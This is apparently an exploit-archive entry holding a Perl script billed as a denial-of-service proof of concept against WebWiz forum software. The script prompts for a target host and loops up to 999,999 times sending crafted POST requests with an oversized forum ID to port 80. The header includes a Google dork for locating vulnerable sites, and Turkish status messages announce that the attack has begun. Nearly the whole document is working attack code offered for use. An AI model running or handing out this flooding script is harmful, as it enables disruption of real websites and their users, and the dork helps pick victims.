|
# Exploit Title: [WebWiz Denial of Service Exploit]
# Date: [06.09.10]
# Author: [BARCOD3]
# Version: [9.69]
# Category:: [PoC]
# Google dork: [inurl:powered by webwiz]
# Tested on: [redhat]
#!/usr/bin/perl
use IO::Socket;
print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
print "+ WebWiz Denial of service exploit +\n";
print "+ exploited by barcode +\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
print "Host |without http://www.| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "forum_topics.asp?FID=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nOffline! - Su lanet yere baglanmaya calisiyoruz. '$host' it May be DoSed\n" unless $sock;
print $sock "POST $pth/viewforum.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "Saldiri basladi... Sakin ol. ";
$x++;
}
}
|
| |
|
推荐
评论(0条)
